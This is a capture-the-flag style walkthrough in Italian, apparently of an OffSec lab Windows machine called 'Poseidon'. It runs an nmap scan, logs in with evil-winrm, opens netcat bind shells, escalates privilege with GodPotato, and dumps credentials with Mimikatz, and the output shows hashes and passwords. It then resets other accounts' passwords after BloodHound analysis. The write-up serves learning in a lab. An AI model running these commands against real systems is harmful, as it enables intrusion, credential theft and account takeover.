Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-03 10:09 CET
Nmap scan report for 192.168.166.163
Host is up (0.068s latency).

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-01-03T09:11:47
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Exploit

Uso le credenziali trovate nella macchina 192.168.166.162:

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ evil-winrm -i 192.168.166.163 -u chen -p 'freedom'                   

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\chen\Documents> whoami
sub\chen
*Evil-WinRM* PS C:\Users\chen\Documents>

Apri una shell interativa:

PowerShell

*Evil-WinRM* PS C:\Users\chen\Documents> .\nc.exe -nlvp 4466 -e cmd
nc.exe : listening on [any] 4466 ...

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ nc 192.168.166.163 4466
Microsoft Windows [Version 10.0.19042.1706]
(c) Microsoft Corporation. All rights reserved.

C:\Users\chen\Documents>whoami
whoami
sub\chen

Privilege Escalation

Verifico i permessi dell'utente chen:

PowerShell

C:\Users\chen\Documents>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeTcbPrivilege                Act as part of the operating system       Enabled
SeShutdownPrivilege           Shut down the system                      Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
SeTimeZonePrivilege           Change the time zone                      Enabled

Sfrutto il pribvilegio SeImpersonatePrivilege con GodPotato.

Non è possibile aprire un tunnel dalla macchiana target e a quella kali. quindi procedo al contrario, aprendo un listener in ascolto tramite GodPotato:

PowerShell

C:\Users\chen\Documents\wintools>godpotato-net4.exe -cmd "C:\Users\chen\Documents\wintools\nc.exe -nlvp 4499 -e cmd"

E aprendolo da kali:

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ nc 192.168.166.163 4499                 
Microsoft Windows [Version 10.0.19042.1706]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami

Infine recupero le flag local.txt e proof.txt:

Post Privilege Escalation

Cambio la password di Administrator per comodità nei futuri accessi:

PowerShell

C:\Users\chen\Documents\wintools>net user Administrator Aa.123456!
net user Administrator Aa.123456!
The command completed successfully.

Mi ricollego tramite Evil-WinRM come Administrator:

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ evil-winrm -i 192.168.166.163 -u Administrator -p 'Aa.123456!'

Eseguo Mimikatz:

PowerShell

C:\Users\chen\Documents\wintools>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 327403 (00000000:0004feeb)
Session           : Service from 0
User Name         : lisa
Domain            : sub
Logon Server      : DC02
Logon Time        : 12/11/2024 9:14:57 PM
SID               : S-1-5-21-4168247447-1722543658-2110108262-1106
        msv :
         [00000003] Primary
         * Username : lisa
         * Domain   : sub
         * NTLM     : 905ae9b4d957545fb7b9ea0c4333247b
         * SHA1     : 469cc5a177cf467cc0bd5759ef046155c7434ce7
         * DPAPI    : d6dd3ca4075a7884d2cad98a6cea83c0
        tspkg :
        wdigest :
         * Username : lisa
         * Domain   : sub
         * Password : LisaWayToGo456
        kerberos :
         * Username : lisa
         * Domain   : SUB.POSEIDON.YZX
         * Password : LisaWayToGo456
        ssp :
        credman :
        cloudap :

[...]

mimikatz(commandline) # exit
Bye!

Trovo le seguenti credenziali:

lisa:LisaWayToGo456

Verico, come SYSTEM la possibilità di usare Sharphound:

PowerShell

C:\Windows\system32>net user /domain
net user /domain
The request will be processed at a domain controller for domain sub.poseidon.yzx.


User accounts for \\dc02.sub.poseidon.yzx

-------------------------------------------------------------------------------
Administrator            chen                     DefaultAccount           
Guest                    jackie                   krbtgt                   
lisa                     
The command completed with one or more errors.

Creo il file da carica su BloodHound:

PowerShell

C:\Users\chen\Documents\wintools>Sharphound.exe -c all,gpolocalgroup
Sharphound.exe -c all,gpolocalgroup

E lo scarico su kali:

PowerShell

*Evil-WinRM* PS C:\Users\chen\Documents\wintools> download 20250103150943_BloodHound.zip

Info: Downloading C:\Users\chen\Documents\wintools\20250103150943_BloodHound.zip to 20250103150943_BloodHound.zip                                                                  
Info: Download successful!

Carico il file su BloodHound.

Eseguo il cambio password di jackie come suggerito da BloodHound:

Bash

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Poseidon]
└─$ net rpc password 'jackie' 'Aa.123456!' -U "sub.poseidon.yzx"/"lisa"%"LisaWayToGo456" -S "192.168.166.162"

Utilizzo le credenziali per accedere alla macchina DC02.